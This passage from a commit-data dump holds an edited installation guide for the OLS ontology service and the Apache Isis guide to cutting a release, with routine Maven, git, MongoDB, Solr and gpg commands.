SDK]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} 
{"commit":"e14af108868fa7d5bccd6284e2c0f75163977daf","subject":"Update installation-guide.adoc","message":"Update installation-guide.adoc","repos":"EBISPOT\/OLS,EBISPOT\/OLS,EBISPOT\/OLS,EBISPOT\/OLS","old_file":"ols-web\/src\/main\/asciidoc\/installation-guide.adoc","new_file":"ols-web\/src\/main\/asciidoc\/installation-guide.adoc","new_contents":"= Build a local Version of OLS\n:doctype: book\n:toc: left\n:toc-title: OLS Installation\n:sectanchors:\n:sectlinks:\n:toclevels: 4\n:source-highlighter: highlightjs\n\n[[Introduction]]\n== Introduction\nThe OLS (http:\/\/www.ebi.ac.uk\/ols ) aims to be a comprehensive collection of biomedical ontologies for the life sciences. OLS is open source and therefore can be downloaded and used for your own projects. This guide should help with the installation of a local version of OLS.\n\n\n== Premise: Software requirements\nIn order to be able to run OLS, there are some Software requirements that have to be fulfilled and therefore installed locally. There are multiple ways to install the relevant software and of course the exact way depends on the OS you use. For Mac OS one way to go is homebrew.\n\n|=======\n| *Software* | *Description* | *Installation with homebrew (OS X)*\n| java 1.8 | development language | _(no direct homebrew support)_\n| maven 3+ | dependency manager\/build environment | brew install maven\n| tomcat 7.5+ | webserver | brew install tomcat\n| mongodb (2.7.8+) | database | brew install mongodb\n| solr 5.2.1+ | Indxing\/search engine | brew install solr\n|=======\n\nNOTE: Java, maven, mongodb and solr should be available in the environment, so make sure the relevant environment variable is set! If you installed the software via a 'package manager', this might have been done automatically.\n\n== Obtaining the source code\nDownload the source code from the OLS github repository https:\/\/github.com\/EBISPOT\/OLS alternativly (if git is installed), you can of course clone the repository with `git clone https:\/\/github.com\/EBISPOT\/OLS.git`\n\n== Configurations\nThe default configuration for OLS can be found at `OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/ols-config.yaml`\n\nExample configuration file:\n**********************\n## EFO +\n# * are required fields\n\n*id:* efo \/\/ short unique id for the ontology * +\n*preferredPrefix:* EFO\t\/\/ preferred display name for the ontology +\n*title:* Experimental Factor Ontology \/\/ Short title of the ontology +\n*uri:* http:\/\/www.ebi.ac.uk\/efo \/\/ The ontology URI *\n*description:* \"The Experimental Factor Ontology (EFO) provides a...\" \/\/ Full ontology description +\n*ontology_purl:* http:\/\/www.ebi.ac.uk\/efo\/efo.owl \/\/ URL to get the ontology from * +\n*homepage:* http:\/\/www.ebi.ac.uk\/efo \/\/ homepage of the ontology +\n*mailing_list:* efo-users@lists.sourceforge.net \/\/ assocaited mailing list +\n*definition_property:* \/\/ predicates that are used for term definitions +\n -- http:\/\/www.ebi.ac.uk\/efo\/definition +\n*synonym_property:* \/\/ prediates used for synonyms +\n -- http:\/\/www.ebi.ac.uk\/efo\/alternative_term +\n*hierarchical_property:* \/\/ predicates that are hierarchical (like part of) will be included in default tree view +\n -- http:\/\/purl.obolibrary.org\/obo\/BFO_0000050 +\n -- http:\/\/purl.obolibrary.org\/obo\/RO_0002202 +\n*hidden_property:* \/\/ any predicates that should be ignored when indexing +\n -- http:\/\/www.ebi.ac.uk\/efo\/has_flag +\n*base_uri:* \/\/ base URIs for local terms +\n -- http:\/\/www.ebi.ac.uk\/efo\/EFO_ 
+\n*reasoner:* OWL2 \/\/ can be one of OWL2, EL, NONE - default is EL + \n*oboSlims:* false \/\/ contains OBO style slim annotations +\n**********************\n\nOLS is also able to import Yaml files following the OBO foundry specification. By default it will load the OBO config from the classpath. If you don't want the OBO ontologies, delete or rename the obo-config.yaml file. You may also need to comment out the property from the `git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties` file (`ols.obofoundry.ontology.config`)\nhttps:\/\/raw.githubusercontent.com\/OBOFoundry\/OBOFoundry.github.io\/master\/_config.yml\n\n== Building OLS\nYou can build your version of OLS by using maven. Go to your local OLS folder and execute\n\n`mvn clean install`\n\nAfter a successful build process, this should create target folders.\n\n\n== Initializing OLS (Loading and indexing resources\/ontologies)\n=== Loading the configuration files into MongoDB\nIn order to be able to load and index data in OLS, the MongoDB as well as Solr have to be available, so they need to be up and running. By contrast, the local tomcat server has to be down before running the `ols-indexer.jar`.\n\nOLS uses mongodb to persist ontology configuration. To load the ontology configuration into your mongodb database, first make sure your mongo database is running.\n\nTo invoke the import process with different options, for example because you changed it, you can run the file ols-config-importer.jar (`java -jar ols-config-importer.jar`) in the folder `OLS\/ols-apps\/ols-config-importer\/target`.\n\nNOTE: OLS uses default mongo connection options. You can override any of these by editing the application.properties file in the git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties file.\n\n----------------\n# MONGODB (MongoProperties)\nspring.data.mongodb.authentication-database= # Authentication database name.\nspring.data.mongodb.database=test # Database name.\nspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\nspring.data.mongodb.grid-fs-database= # GridFS database name.\nspring.data.mongodb.host=localhost # Mongo server host.\nspring.data.mongodb.password= # Login password of the mongo server.\nspring.data.mongodb.port=27017 # Mongo server port.\nspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\nspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\nspring.data.mongodb.username= # Login user of the mongo server.\n----------------\n\nAt this point the config should be loaded into your mongo db database called ols and a document collection called olsadmin.\n\nIf you need to update any config or reload the config, simply re-run the config-loader.jar as required.\n\n=== Building the Neo4J and SOLR indexes\nOLS provides a single application for indexing ontologies. When run, this program does a few things:\n\n---\n\n1. Read ontologies from the config loaded into the MongoDB\n2. Download each file to a local directory\na. If this is the first time it will set the ontology status to 'TOLOAD' in the mongo database.\nb. If this is run a subsequent time it will compare the latest download to the last file it downloaded. If these files are different it will set the ontology status 'TOLOAD' in the mongo database.\n3. All ontologies in the mongo database that have status 'TOLOAD' will get stored in both the SOLR and Neo4J index. 
Any older versions indexed will be deleted first.\n\n---\n\nFor this to work you need to make sure your Mongo and SOLR servers are running. You don't need a Neo4J server as OLS uses an embedded Neo4J database. If you already have a tomcat server running with OLS deployed and it is using the same index files as SOLR and Neo4J, it is advised to shut down the tomcat before running this script.\n\nTo invoke the indexer process you can run the file ols-loading-app.jar (`java -jar ols-loading-app.jar`) in the folder OLS\/ols-apps\/ols-loading-app\/target.\n\nThis script has two optional arguments:\n\n* -f <list of ontologies> : Used to force the reload of a particular ontology\n* -off : Used to run in offline mode; ontologies will not be downloaded from the Web.\n\nAdditional configuration can be specified in the `application.properties` file before compilation or using `-D<propertyname>=<value>` at runtime.\n\n----------------\nspring.data.mongodb.database ols # mongo db name, default is ols\n\n# SOLR (SolrProperties)\nspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\nols.solr.search.core ontology\nols.solr.suggest.core autosuggest\n\n#Mongo DB properties same as above\n----------------\n\nBy default OLS will use ~\/.ols as the working directory for OLS where files will be downloaded and Neo4J indexes will be created. You can override this by setting the $OLS_HOME environment variable to a custom directory. You can also override this by passing the `-Dols.home=` argument to any of the scripts.\n\nProvided this script has run successfully, you can rerun it to update the OLS indexes. Each time you run it, it will fetch the latest ontologies and only index the ones that have changed. Remember to shut down the tomcat before running this app.\n\n\n== Deploying the app on local server\nTo deploy OLS on the local server, it is necessary to copy certain .war files from the OLS-web target directory (`OLS\/ols-web\/target`) into the webapps folder of the local tomcat server. After starting tomcat (via `startup.sh` in the bin folder), there should be a local version of OLS running at http:\/\/localhost:8080\/ols-boot.\n\nAny configuration can be overridden using the same properties above. Put them in the application.properties file in the `ols-web\/src\/main\/resource\/application.properties` file before compiling that jar.\n","old_contents":"= Build a local Version of OLS\n:doctype: book\n:toc: left\n:toc-title: OLS Installation\n:sectanchors:\n:sectlinks:\n:toclevels: 4\n:source-highlighter: highlightjs\n\n[[Introduction]]\n== Introduction\nThe OLS (http:\/\/www.ebi.ac.uk\/ols ) aims to be a comprehensive collection of biomedical ontologies for the life sciences. OLS is open source and therefore can be downloaded and used for your own projects. This guide should help with the installation of a local version of OLS.\n\n\n== Premise: Software requirements\nIn order to be able to run OLS, there are some Software requirements that have to be fulfilled and therefore installed locally. There are multiple ways to install the relevant software and of course the exact way depends on the OS you use. 
For Mac OS one way to go is homebrew.\n\n|=======\n| *Software* | *Description* | *Installation with homebrew (OS X)*\n| java 1.8 | development language | _(no direct homebrew support)_\n| maven 3+ | dependency manager\/build environment | brew install maven\n| tomcat 7.5+ | webserver | brew install tomcat\n| mongodb (2.7.8+) | database | brew install mongodb\n| solr 5.2.1+ | Indxing\/search engine | brew install solr\n|=======\n\nNOTE: Java, maven, mongodb and solr should be available in the environment, so make sure the relevant environment variable is set! If you installed the software via a 'package manager', this might have been done automatically.\n\n== Obtaining the source code\nDownload the source code from the OLS github repository https:\/\/github.com\/EBISPOT\/OLS alternativly (if git is installed), you can of course clone the repository with `git clone https:\/\/github.com\/EBISPOT\/OLS.git`\n\n== Configurations\nThe default configuration for OLS can be found at `OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/ols-config.yaml`\n\nExample configuration file:\n**********************\n## EFO +\n# * are required fields\n\n*id:* efo \/\/ short unique id for the ontology * +\n*preferredPrefix:* EFO\t\/\/ preferred display name for the ontology +\n*title:* Experimental Factor Ontology \/\/ Short title of the ontology +\n*uri:* http:\/\/www.ebi.ac.uk\/efo \/\/ The ontology URI *\n*description:* \"The Experimental Factor Ontology (EFO) provides a...\" \/\/ Full ontology description +\n*ontology_purl:* http:\/\/www.ebi.ac.uk\/efo\/efo.owl \/\/ URL to get the ontology from * +\n*homepage:* http:\/\/www.ebi.ac.uk\/efo \/\/ homepage of the ontology +\n*mailing_list:* efo-users@lists.sourceforge.net \/\/ assocaited mailing list +\n*definition_property:* \/\/ predicates that are used for term definitions +\n -- http:\/\/www.ebi.ac.uk\/efo\/definition +\n*synonym_property:* \/\/ prediates used for synonyms +\n -- http:\/\/www.ebi.ac.uk\/efo\/alternative_term +\n*hierarchical_property:* \/\/ predicates that are hierarchical (like part of) will be included in default tree view +\n -- http:\/\/purl.obolibrary.org\/obo\/BFO_0000050 +\n -- http:\/\/purl.obolibrary.org\/obo\/RO_0002202 +\n*hidden_property:* \/\/ any predicates that should be ignored when indexing +\n -- http:\/\/www.ebi.ac.uk\/efo\/has_flag +\n*base_uri:* \/\/ base URIs for local terms +\n -- http:\/\/www.ebi.ac.uk\/efo\/EFO_ +\n*reasoner:* OWL2 \/\/ can be one of OWL2, EL, NONE - deafult is EL\n*isInferred:* false \/\/ if true no reasoner will be used +\n*oboSlims:* false \/\/ contains OBO style slim annotations +\n**********************\n\nOLS is also able to import Yaml files following the OBO foundry specification. By default it will load the OBO config from the classpath. If you don't want the OBO ontologies delete or rename the obo-config.yaml file. You may also need to comment out the property from the `git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties` file (`ols.obofoundry.ontology.config`)\nhttps:\/\/raw.githubusercontent.com\/OBOFoundry\/OBOFoundry.github.io\/master\/_config.yml\n\n== Building OLS\nYou can build your version of OLS by using maven. 
Go to your local OLS folder and execute\n\n`mvn clean install`\n\nAfter a successful build process, this should create target folders.\n\n\n== Initializing OLS (Loading and indexing resources\/ontologies)\n=== Loading the configuration files into MongoDB\nIn order to be able to load and index data in OLS, the MongoDB as well as Solr have to be available, so they need to be up and running. In contrast to that, the local tomcat server has to be down before running the `ols-indexer.jar`\n\nOLS uses mongodb to persist ontology configuration. To load the ontology configuration into your mongodb database, first make sure your mongo database is running.\n\nTo invoke the import process with different options, for example because you changed it, you can run the file ols-config-importer.jar (`java -jar ols-config-importer.jar`) in the folder `OLS\/ols-apps\/ols-config-importer\/target`.\n\nNOTE: OLS uses default mongo connection option. You can overide any of these by editing the application.properties file in the git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties file.\n\n----------------\n# MONGODB (MongoProperties)\nspring.data.mongodb.authentication-database= # Authentication database name.\nspring.data.mongodb.database=test # Database name.\nspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\nspring.data.mongodb.grid-fs-database= # GridFS database name.\nspring.data.mongodb.host=localhost # Mongo server host.\nspring.data.mongodb.password= # Login password of the mongo server.\nspring.data.mongodb.port=27017 # Mongo server port.\nspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\nspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\nspring.data.mongodb.username= # Login user of the mongo server.\n----------------\n\nAt this point the config should be loaded into your mongo db database called ols and a document collection called olsadmin.\n\nIf you need to update any config or reload the config, simply re-run the config-loader.jar as required.\n\n=== Building the Neo4J and SOLR indexes\nOLS provides a single application for indexing ontologies. When run this program does a few things:\n\n---\n\n1. Read ontologies from the config loaded into the MongoDB\n2. Download each file to a local directory\na. If this is the first time it will set the ontology status to 'TO LOAD' in the mongo database.\nb. If this is run a subsequent time it will check the latest download to the last file it downloaded. If these files are different it will set the ontology status 'TOLOAD' in the mongo database.\n3. All ontologies in the mongo database that have status 'TOLOAD' will get stored in both the SOLR and Neo4J index. Any older versions indexed will be deleted first.\n\n---\n\nFor this to work you need to make sure your Mongo and SOLR servers are running. You don't need a Neo4J server as OLS uses an embedded Neo4J database. 
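If you installed the prerequisites with homebrew as described above, the two servers can typically be brought up with something like the following (a sketch only; the exact formula and service names depend on your homebrew setup):\n\n----------------\nbrew services start mongodb\nbrew services start solr\n----------------\n\n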
If you already have a tomcat server running with OLS deployed and it is using the same index files as SOLR and Neo4J, it is advised to shutdown the tomcat before running this script.\n\nTo invoke the indexer process you can run the file ols-loading-app.jar (`java -jar ols-loading-app.jar`) in the folder OLS\/ols-apps\/ols-loading-app\/target.\n\nThis script has two optional arguments:\n\n* -f <list of ontologies> : Used to force the reload of a particular ontology\n* -off : Used to run in offline mode, ontologies will not be downloaded from the Web.\n\nAdditional configuration can be specified in the `application.properties` file before compilation or using the ``-D<propertyname>=<value>` at runtime.\n\n----------------\nspring.data.mongodb.database ols # mongo db name, default is ols\n\n# SOLR (SolrProperties)\nspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\nols.solr.search.core ontology\nols.solr.suggest.core autosuggest\n\n#Mongo DB properties same as above\n----------------\n\nBy default OLS will use ~\/.ols as the working directory for OLS where files will be downloaded and Neo4J indexes will be created. You can override this by setting the $OLS_HOME environment variable to a custom directory. You can also override this by passing the ``-Dols.home=` argument to any of the scripts.\n\nProviding this script has run successfully, you can rerun this script to update the OLS indexes. Each time you run it it will fetch the latest ontologies and only index the ones that have changed. Remember to shut down the tomcat before running this app.\n\n\n== Deploying the app on local server\nTo deploy OLS on the local server, it is necessary to copy certain .war files from the OLS-web target directory (`OLS\/ols-web\/target`) into the webapps folder of the local tomcat server. After starting tomcat (via `startup.sh` in the bin folder), there should be a local version of OLS running at http:\/\/localhost:8080\/ols-boot.\n\nAny configuration can be overridden using the same properties above. Put them in the application.properties file in the `ols-web\/src\/main\/resource\/application.properties` file before compiling that jar.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"844bfd7a5d6e4c0e8b0238fc4999629cd086ef64","subject":"ISIS-2450: minor fix to release docs","message":"ISIS-2450: minor fix to release docs\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/comguide\/modules\/ROOT\/pages\/cutting-a-release.adoc","new_file":"antora\/components\/comguide\/modules\/ROOT\/pages\/cutting-a-release.adoc","new_contents":"= Cutting a Release\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:comguide:ROOT:verifying-releases.adoc[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:comguide:ROOT:post-release-successful.adoc[successful] or an xref:comguide:ROOT:post-release-unsuccessful.adoc[unsuccessful] vote.\n\nApache Isis itself is released in one go; everything is ultimately a child of `isis-parent\/pom.xml` (relative to the link:https:\/\/github.com\/apache\/isis[source code root]).\nThis section details the process for formally releasing this module.\n\nThe subsequent sections describe how other committers can xref:comguide:ROOT:verifying-releases.adoc[verify a release] and how the release manager can then perform xref:comguide:ROOT:post-release-successful.adoc[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:comguide:ROOT:release-process-prereqs.adoc[prerequisites] that must be configured first.\nIn particular, you'll need signed public\/private keys, and the ASF Nexus staging repo in your local `~\/.m2\/settings.xml` file.\n\nThese release notes use bash command-line tools.\nThey should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n== Preparation\n\n=== Obtain Consensus\n\nBefore releasing the framework, ensure there is consensus on the xref:docs:support:mailing-list.adoc[dev mailing list] that this is the right time for a release.\nThe discussion should include confirming the version number to be used, and confirming the content.\n\nThese discussions should also confirm the version number of the module being released.\nThis should be in line with our xref:comguide:ROOT:policies\/versioning-policy.adoc#semantic-versioning[semantic versioning policy].\n\nMake sure you have a JIRA ticket open against which to perform all commits.\nIn most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n=== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released.\nThis will usually be the tip of the origin's `master` branch:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n----\n\n\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license headers.\nThe parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash,subs=\"attributes+\"]\n.find unapproved\/missing licenses\n----\nmvn clean\n\npushd isis-parent\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=1000 -Dreleased -P'!all'\npopd\n\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done > \/tmp\/rat-qn.txt\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done > \/tmp\/rat-al.txt\n----\n\nNOTE: the parent `pom.xml` in each of these locations has the `apache-rat-plugin` appropriately configured.\n\nThis script runs over all submodules, including non-released modules.\n\nThe command writes out a `target\/rat.txt` for each submodule.
Missing license notes are indicated using the key `!???`.\nThe `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers to Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nOnce you've fixed all issues, run the script again to confirm that all license violations have been fixed.\n\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information.\nWithout appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`.\nThis is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nIt's first necessary to have built the framework locally at least once.\n\nIn the root directory:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn clean install -o\n----\n\nOnce this is done, capture the missing license information using:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn license:download-licenses\ngroovy scripts\/checkmissinglicenses.groovy\n----\n\n\nThe Maven plugin creates a `licenses.xml` file in the `target\/generated-resources` directory of each module.\nThe script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash,subs=\"attributes+\"]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n=== Update and preview website\n\nGenerate the website, ensuring that the config, examples, projdoc (system overview and global index) are all updated:\n\n[source,bash,subs=\"attributes+\"]\n----\nsh preview.sh\n----\n\nCheck for any Asciidoc errors, and fix.\n\n\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit add ..\ngit commit -m \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n== Releasing the Framework\n\n=== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible.\nFor example:\n\n[source,bash,subs=\"attributes+\"]\n----\nexport ISISJIRA=ISIS-9999 # <.>\nexport ISISTMP=\/c\/tmp # <.>\nexport ISISREL={page-isisrel} # <.>\nexport ISISRC=RC1 # <.>\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISART=isis\nenv | grep ISIS | sort\n----\n<.> set to an \"umbrella\" ticket for all release activities.\n(One should exist already, xref:comguide:ROOT:post-release-successful.adoc#create-new-jira[created at] the beginning of the development cycle now completing).\n<.> adjust by platform\n<.> adjust as required\n<.> adjust as necessary if this is not the first attempt to release\n\n\n[IMPORTANT]\n====\nThe branch name
is intentionally *not* the same as the eventual tag names (eg `isis-{page-isisrel}`).\n====\n\n\n=== Create a release branch and worktree\n\nThe release is performed on a branch; if we are successful, this branch will be merged back into master.\n\nWe also recommend performing this work in a separate git worktree.\nThe original worktree can stay with the `master` branch and be used for documentation fixes, etc.\n\n* create (but don't checkout) a release branch for the version number being released; eg:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit branch $ISISBRANCH\n----\n\n* Create a worktree for this branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit worktree add ..\/isis-release $ISISBRANCH\n----\n\n* Switch to the new worktree and push the branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-release\ngit push origin $ISISBRANCH -u\n----\n\n* Finally switch to the `isis-parent` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd isis-parent\n----\n\n=== Bump code to `$ISISREL`\n\nSearch through the `.java` files for `{page-isisprev}`, and change to `{page-isisrel}`.\n\n=== Bump projects to `$ISISREL`\n\nWe use `mvn versions:set` to manually bump the release version:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=$ISISREL\nmvn install -o -DskipTests\n\npushd ..\/starters\nmvn versions:set -DnewVersion=$ISISREL\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: bumps version to $ISISREL\"\n----\n\nNOTE: After release, there is a xref:comguide:ROOT:cutting-a-release.adoc#reset-revision-property[similar step at the end] to reset back to `2.0.0-SNAPSHOT`.\n\n\n=== Sanity check\n\nPerform one last sanity check on the codebase.\nDelete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash,subs=\"attributes+\"]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o -Dreleased -P'!all'\n----\n\n[NOTE]\n====\nThe `released` system property is set to only sanity check the modules actually to be released (ignores the incubator modules).\n\nPartly that's because there's no need to check the incubator modules, it's also because the incubator modules require Java 11 (Java 8 is used for everything else)\n====\n\n\n=== Deploy\n\nSince the `<version>` has already been updated, we just use `mvn deploy` to upload the artifacts.\nWe activate the (inherited) `apache-release` profile to bring in the `gpg` plugin for code signing.\n\nThe build creates a zip of the directory, so before executing the release we remove any other files.\nStill in the `isis-parent` directory:\n\n[source,bash]\n----\npushd ..\ngit clean -dfx\npopd\n----\n\nTo deploy (upload the artifacts), we use:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn deploy \\\n -Dapache-release \\\n -Dgit\n----\n\nWhen prompted, enter your GPG passphrase.\n(Or, it might be sufficient to add just `-Dgpg.passphrase=\"...\"`)\n\nIMPORTANT: This requires `gpg` v2.1 or later.\n\n\n=== Tag the Release\n\nFinally, tag the release:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit tag $ISISART-$ISISREL\ngit tag $ISISART-$ISISREL-$ISISRC\n----\n\n\n=== Check\/Close Staging Repo\n\nThe `mvn deploy` commands will have uploaded all of the release artifacts into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::release-process\/nexus-staging-0.png[width=\"600px\"]\n\nAnd then check that the release has been staged 
(select `staging repositories` from left-hand side):\n\nimage::release-process\/nexus-staging-1.png[width=\"600px\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread.\nIn the screenshot above the id is `org.apache.isis-008`.\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository.\nThis will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::release-process\/nexus-staging-2.png[width=\"600px\"]\n\nNexus should start the process of closing the repository.\n\nimage::release-process\/nexus-staging-2a.png[width=\"600px\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::release-process\/nexus-staging-3.png[width=\"600px\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::release-process\/nexus-staging-4.png[width=\"600px\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing.\nSee xref:comguide:ROOT:key-generation.adoc[Key Generation] for more details.\n====\n\n[#reset-revision-property]\n=== Reset `revision` property\n\nAt the beginning of the release process we bumped the version to the release version, ie `$ISISREL`.\nWith the release now deployed we now need to reset the revision back down to the base snapshot, ie `2.0.0-SNAPSHOT`.\n\n[NOTE]\n====\nPreviously we bumped to the next development snapshot.\nHowever, this approach doesn't play well with CI\/CD when Apache Isis is mounted as a git submodule, so instead we always use `2.0.0-SNAPSHOT` for all development work.\n====\n\nTherefore (still in the `isis-parent` directory):\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o -Dreleased -P'!all'\n\npushd ..\/starters\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: resetting version\"\n----\n\n=== Push branch & tag\n\nPush the release branch to origin:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tag:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tags aren't visible locally but can be seen link:https:\/\/github.com\/apache\/isis\/tags[online].\n====\n\n== Update starter apps\n\nFor each starter app, we create a new branch and make the changes there, pushing the branch back if the sanity check passes.\n\n\n* for helloworld, the steps are:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -o\nmvn spring-boot:run\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n\n* for simple app, the steps are almost the same:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit 
checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -Dmetamodel.lockdown\nmvn -pl webapp test -Dmavendeps.lockdown -B # <.>\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n<.> the `-B` flag is required to avoid control characters in generated output\n+\nApprove any failed lockdown tests (the mavendeps will fail first time around because the dependencies on Apache Isis itself have just been bumped).\n+\nRepeat, then run the app as a sanity check:\n+\n[source,bash,subs=\"attributes+\"]\n----\nmvn -pl webapp spring-boot:run\n----\n+\nYou could also check the output of the Cucumber tests, under:\n\n** `webapp\/target\/cucumber-reports` and\n** `webapp\/target\/cucumber-html-reports`.\n\n* For both apps, commit any changes and then push the release branch to origin once everything is ok:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit add .\ngit commit -m \"$ISISJIRA - updates to $ISISREL\"\ngit push -u origin $ISISBRANCH\n----\n\n== Preview website\n\nWe also prepare a preview of the next version of the website, which is then made accessible at link:https:\/\/isis.staged.apache.org[].\n\n* Prerequisites:\n\n** clone the link:https:\/\/github.com\/apache\/isis-site[] repo, alongside the `isis` repo:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit clone https:\/\/github.com\/apache\/isis-site ..\/isis-site\n----\n\n** in the `isis-site` repo, check out the `asf-staging` branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit checkout asf-staging\ngit pull --ff-only\n----\n\n* still in the `isis-site` repo, delete all the files in `content\/` _except_ for the `schema` and `versions` directories:\n+\n[source,bash,subs=\"attributes+\"]\n----\npushd content\nfor a in $(ls -1 | grep -v schema | grep -v versions)\ndo\n rm -rf $a\ndone\npopd\n----\n\n* Back in the `isis` repo's worktree for `master` (as opposed to the `release` worktree, that is), generate the Antora site (from the top-level 